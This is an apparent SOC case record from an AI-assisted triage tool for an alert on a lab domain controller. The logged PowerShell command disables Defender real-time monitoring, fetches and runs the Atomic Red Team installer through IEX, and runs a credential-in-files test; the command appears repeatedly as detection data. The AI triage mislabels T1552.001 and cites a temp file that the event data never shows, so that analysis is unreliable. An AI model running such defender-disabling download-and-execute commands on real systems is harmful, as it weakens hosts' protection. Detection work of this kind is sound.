โ
Case #498
general.RealTime Monitoring Tampering
๐ท๏ธ Analyst Verdict Classification
TP by analyst๐ค AI Analysis
๐ Detections (1)
Realtime Monitoring Process Killed PID 9164
critical
Rule: general.RealTime Monitoring Tampering
Hostname: df-labsdc01.dflabs.local ยท Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 92% ยท Verdict: true positive
Event Data:
BASE_ADDRESS:
140694944940032
COMMAND_LINE:
PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1552.001 -CheckPrereqs ; Invoke-AtomicTest T1552.001 -GetPrereqs ; Invoke-AtomicTest T1552.001
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
238641152
PARENT:
{'BASE_ADDRESS': 140698856259584, 'COMMAND_LINE': 'cmd.exe /C C:\\Windows\\TEMP\\pldDCD7.tmp.bat T1552.001 ', 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\cmd.exe', 'HASH': '3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2', 'MEMORY_USAGE': 4489216, 'PARENT_ATOM': 'd2b1ecad7af81b32ac16ae0d69c2a7fe', 'PARENT_PROCESS_ID': 3496, 'PROCESS_ID': 9164, 'THIS_ATOM': '2eddc57635edafdc772cd43169c2a851', 'THREADS': 3, 'TIMESTAMP': 1774364752869, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
9164
PROCESS_ID:
2584
THREADS:
31
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs:
{'type': 'command_line', 'value': "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)"}
{'type': 'url', 'value': 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1'}
{'type': 'technique', 'value': 'T1552.001 - Exploitation of Remote Code Execution'}
MITRE:
T1552.001
T1059.004
T1567.001
Analyst Declaration:
๐ Raw Detection JSON
{
"author": "ckeller@fusioncybersecurity.us",
"cat": "Realtime Monitoring Process Killed PID 9164",
"detect": {
"event": {
"BASE_ADDRESS": 140694944940032,
"COMMAND_LINE": "PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1552.001 -CheckPrereqs ; Invoke-AtomicTest T1552.001 -GetPrereqs ; Invoke-AtomicTest T1552.001 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"MEMORY_USAGE": 238641152,
"PARENT": {
"BASE_ADDRESS": 140698856259584,
"COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pldDCD7.tmp.bat T1552.001 ",
"FILE_IS_SIGNED": 1,
"FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
"HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
"MEMORY_USAGE": 4489216,
"PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
"PARENT_PROCESS_ID": 3496,
"PROCESS_ID": 9164,
"THIS_ATOM": "2eddc57635edafdc772cd43169c2a851",
"THREADS": 3,
"TIMESTAMP": 1774364752869,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"PARENT_PROCESS_ID": 9164,
"PROCESS_ID": 2584,
"THREADS": 31,
"USER_NAME": "NT AUTHORITY\\SYSTEM"
},
"routing": {
"arch": 2,
"did": "",
"event_id": "6741a4a8-eb86-4026-9e1a-0da01f2f48fe",
"event_time": 1774364753471,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 3256,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "2eddc57635edafdc772cd43169c2a851",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "0faf1760d8bf36ee150fa36d69c2a853"
}
},
"detect_id": "88437190-1557-4f5c-86d2-c11e69c2a854",
"gen_time": 1774364756732,
"link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364753\u0026selected=0faf1760d8bf36ee150fa36d69c2a853",
"namespace": "general",
"routing": {
"arch": 2,
"did": "",
"event_id": "6741a4a8-eb86-4026-9e1a-0da01f2f48fe",
"event_time": 1774364753471,
"event_type": "NEW_PROCESS",
"ext_ip": "67.60.122.240",
"hostname": "df-labsdc01.dflabs.local",
"iid": "47501359-645e-4049-906e-e6195da7afcf",
"int_ip": "192.168.45.129",
"latency": 3256,
"moduleid": 2,
"oid": "ad19afae-3759-4207-b06e-8648b225c455",
"parent": "2eddc57635edafdc772cd43169c2a851",
"plat": 268435456,
"sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
"tags": [
"domain-controller",
"fusion-soc-alert",
"fusion-soc-case",
"fusion-soc-pulled",
"fusion-soc-triage"
],
"this": "0faf1760d8bf36ee150fa36d69c2a853"
},
"source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
"source_rule": "general.RealTime Monitoring Tampering",
"ts": 1774364756000
}
๐ Threat Intel JSON
{
"virustotal": {
"malicious": false,
"provider": "virustotal",
"reputation": 73,
"stats": {
"confirmed-timeout": 0,
"failure": 0,
"harmless": 0,
"malicious": 0,
"suspicious": 0,
"timeout": 0,
"type-unsupported": 4,
"undetected": 72
}
}
}
๐ค Triage JSON
{
"confidence": 0.925,
"false_positive_reason": null,
"investigation_questions": [
"What other processes were spawned by PID 2584 that are not listed in the sensor context?",
"Was this event triggered by a scheduled task or user-initiated action?",
"Are there any active network connections established by the PowerShell process?"
],
"ioc_analysis": "The process is running legitimate WindowsPowerShell.exe but executing highly suspicious commands including disabling Microsoft Defender (Set-MpPreference), downloading code via IEX, and invoking ART modules for testing T1552.001 (Exploitation of Remote Code Execution). The parent process chain shows cmd.exe spawning PowerShell, which is a common technique for obfuscation.",
"iocs_extracted": [
{
"type": "command_line",
"value": "Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)"
},
{
"type": "url",
"value": "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1"
},
{
"type": "technique",
"value": "T1552.001 - Exploitation of Remote Code Execution"
}
],
"mitre_techniques": [
"T1552.001",
"T1059.004",
"T1567.001"
],
"recommended_actions": [
"ESCALATE to Incident Response (unanimous AI verdict)",
"Isolate affected sensor immediately",
"Immediately isolate the host from the network to prevent lateral movement or data exfiltration.",
"Block outbound traffic to redcanaryco/invoke-atomicredteam repository at the firewall level.",
"Review and disable the Set-MpPreference command execution in PowerShell history logs.",
"Perform forensic analysis on C:\\Windows\\Temp\\RESE3B4.tmp for potential persistence mechanisms."
],
"risk_score": 90,
"severity": "critical",
"summary": "**Vote: UNANIMOUS (2/2 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed attempt to disable real-time monitoring and deploy the Atomic Red Team (ART) framework using PowerShell under SYSTEM privileges. The command explicitly disables antivirus protection and downloads malicious payloads from an external GitHub repository.\n\n**IOC Analysis:** The process is running legitimate WindowsPowerShell.exe but executing highly suspicious commands including disabling Microsoft Defender (Set-MpPreference), downloading code via IEX, and invoking ART modules for testing T1552.001 (Exploitation of Remote Code Execution). The parent process chain shows cmd.exe spawning PowerShell, which is a common technique for obfuscation.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.9\nA PowerShell process running under SYSTEM account executed commands to disable real-time monitoring and install Atomic Red Team tools, indicating a potential attack to bypass security measures.\n\n**IOC Analysis:** The FILE_PATH is a legitimate Windows system binary located in C:\\Windows\\System32\\, but the command line involves disabling Microsoft Defender real-time monitoring and downloading scripts from GitHub, which is highly suspicious. The hash is signed, but the malicious command negates its legitimacy. The parent process is cmd.exe from TEMP, which is a common attack vector.",
"verdict": "true_positive",
"voting": {
"auto_action": "escalate_ir",
"mode": "unanimous",
"total_models": 2,
"vote_summary": [
"qwen3.5:4b: true_positive (critical, 95% confidence)",
"deepseek-r1:8b: true_positive (high, 90% confidence)"
],
"votes": [
{
"confidence": 0.95,
"model": "qwen3.5:4b",
"verdict": "true_positive"
},
{
"confidence": 0.9,
"model": "deepseek-r1:8b",
"verdict": "true_positive"
}
],
"winning_count": 2,
"winning_verdict": "true_positive"
}
}
โ๏ธ Response Actions
| Action | Target | Status | Result | |
|---|---|---|---|---|
| tag | failed | 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | Lateral Movement Investigation: 50 events found | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | General Activity Sweep: 0 events found | ||
| recommended | executed | Persistence Check: 0 events found |
๐ Add Note
๐ฌ Notes (7)
๐ค FusionSOC AI
2026-03-24T16:08
๐ค FusionSOC AI
2026-03-24T16:08
๐ค FusionSOC AI
2026-03-24T16:08
๐ค FusionSOC AI
2026-03-24T16:08
๐ค FusionSOC AI
2026-03-24T16:08
๐ค FusionSOC AI
2026-03-24T16:08
๐ค FusionSOC AI
2026-03-24T16:08
๐ Timeline
2026-03-24T17:24:18
analyst
Status changed: investigating โ closed
2026-03-24T17:23:59
analyst
Analyst classified as True Positive (TP)
2026-03-24T16:08:29
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:08:29
FusionSOC
Action recommended โ executed: Persistence Check: 0 events found
2026-03-24T16:08:29
FusionSOC AI
Note by FusionSOC AI: ## ๐ Persistence Check **Action:** Perform forensic analysis on C:\Windows\Temp\RESE3B4.tmp for potential persistence me...
2026-03-24T16:08:28
FusionSOC
Response action queued: recommended on Perform forensic analysis on C:\Windows\Temp\RESE3B4.tmp for potential persistence mechanisms.
2026-03-24T16:08:28
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:08:28
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T16:08:28
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Review and disable the Set-MpPreference command execution in PowerShell history ...
2026-03-24T16:08:28
FusionSOC
Response action queued: recommended on Review and disable the Set-MpPreference command execution in PowerShell history logs.
2026-03-24T16:08:28
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:08:28
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T16:08:28
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Block outbound traffic to redcanaryco/invoke-atomicredteam repository at the fir...
2026-03-24T16:08:28
FusionSOC
Response action queued: recommended on Block outbound traffic to redcanaryco/invoke-atomicredteam repository at the firewall level.
2026-03-24T16:08:28
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:08:28
FusionSOC
Action recommended โ executed: Lateral Movement Investigation: 50 events found
2026-03-24T16:08:28
FusionSOC AI
Note by FusionSOC AI: ## ๐ Lateral Movement Investigation **Action:** Immediately isolate the host from the network to prevent lateral movemen...
2026-03-24T16:08:27
FusionSOC
Response action queued: recommended on Immediately isolate the host from the network to prevent lateral movement or data exfiltration.
2026-03-24T16:08:27
FusionSOC AI
Status changed: investigating โ investigating
2026-03-24T16:08:27
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T16:08:27
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** Isolate affected sensor immediately **Sensor:** `e4a1c62d-4d1f-44...` **Time Win...
2026-03-24T16:08:26
FusionSOC
Response action queued: recommended on Isolate affected sensor immediately
2026-03-24T16:08:26
FusionSOC AI
Status changed: open โ investigating
2026-03-24T16:08:26
FusionSOC
Action recommended โ executed: General Activity Sweep: 0 events found
2026-03-24T16:08:26
FusionSOC AI
Note by FusionSOC AI: ## ๐ General Activity Sweep **Action:** ESCALATE to Incident Response (unanimous AI verdict) **Sensor:** `e4a1c62d-4d1f-...
2026-03-24T16:08:26
FusionSOC
Response action queued: recommended on ESCALATE to Incident Response (unanimous AI verdict)
2026-03-24T16:08:26
FusionSOC
Action tag โ failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T16:08:26
FusionSOC
Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T16:08:26
FusionSOC AI
Detection 88437190-1557-4f5c-86d2-c11e69c2a854 triaged as true_positive (critical severity, confidence: 92%)
2026-03-24T16:08:26
FusionSOC AI
Case created from detection: general.RealTime Monitoring Tampering